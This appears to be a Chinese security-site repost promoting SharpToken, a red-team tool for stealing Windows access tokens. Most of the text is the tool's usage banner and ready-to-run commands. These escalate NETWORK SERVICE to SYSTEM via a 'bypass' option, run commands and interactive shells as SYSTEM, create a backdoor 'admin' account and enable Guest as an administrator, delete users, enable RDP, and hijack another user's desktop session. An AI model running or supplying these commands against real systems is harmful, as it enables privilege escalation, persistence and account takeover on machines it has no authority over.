【横向移动】SharpToken - Windows 令牌窃取

admin 2023年6月24日00:56:31评论78 views字数 2143阅读7分8秒阅读模式
【横向移动】SharpToken - Windows 令牌窃取
关注我们 | 发现更多精彩内容
在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也没有办法使用“OpenProcessToken”来窃取 Token。
SharpToken 是一种利用令牌泄漏的工具。它可以从系统中的所有进程中找到泄漏的令牌并使用它们。如果你是低权限服务用户,你甚至可以用它升级到“NT AUTHORITYSYSTEM”权限,无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。..

【横向移动】SharpToken - Windows 令牌窃取

用法
SharpToken By BeichenDream=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITYNETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORITYSYSTEMe.g.SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass

Usage:
SharpToken COMMAND arguments


COMMANDS:
        list_token [process pid]        [bypass]
        list_all_token [process pid] [bypass]
        add_user    <username> <password> [group] [domain] [bypass]
        enableUser <username> <NewPassword> [NewGroup] [bypass]
        delete_user <username> [domain] [bypass]
        execute <tokenUser> <commandLine> [Interactive] [bypass]
        enableRDP [bypass]
        tscon <targetSessionId> [sourceSessionId] [bypass]

example:    SharpToken list_token    SharpToken list_token bypass    SharpToken list_token 6543    SharpToken add_user admin Abcd1234! Administrators    SharpToken enableUser Guest Abcd1234! Administrators    SharpToken delete_user admin    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass    SharpToken execute "NT AUTHORITYSYSTEM" cmd true    SharpToken execute "NT AUTHORITYSYSTEM" cmd true bypass    SharpToken tscon 1


提升权限
除了通常的Token窃取权限增强,SharpToken还支持通过Bypass获取完整的Token
如果你是 NT AUTHORITY/NETWORK SERVICE 用户,你添加了 bypass 参数,SharpToken 会从 RPCSS 窃取 System,即无条件地将 NT AUTHORITYNETWORK SERVICE 改为 NT AUTHORITYSYSTEM

【横向移动】SharpToken - Windows 令牌窃取

ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)

SharpToken list_token

【横向移动】SharpToken - Windows 令牌窃取

枚举来自指定进程的令牌

SharpToken list_token 468

【横向移动】SharpToken - Windows 令牌窃取

获取交互式外壳

execute "NT AUTHORITYSYSTEM" cmd true

【横向移动】SharpToken - Windows 令牌窃取

获取命令执行结果(在webshell下执行)

SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"

【横向移动】SharpToken - Windows 令牌窃取

使用窃取的令牌创建管理员用户

SharpToken add_user admin Abcd1234! Administrators

使用被盗令牌启用管理员用户

SharpToken enableUser Guest Abcd1234! Administrators

使用被盗令牌删除用户

SharpToken delete_user admin

使用窃取的Token切换到目标桌面

其中1是目标用户的桌面,2是我们要接收的桌面

SharpToken tscon 1 2

项目地址:

https://github.com/BeichenDream/SharpToken

原文始发于微信公众号(Ots安全):【横向移动】SharpToken - Windows 令牌窃取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月24日00:56:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【横向移动】SharpToken - Windows 令牌窃取http://cn-sec.com/archives/1828792.html

发表评论

匿名网友 填写信息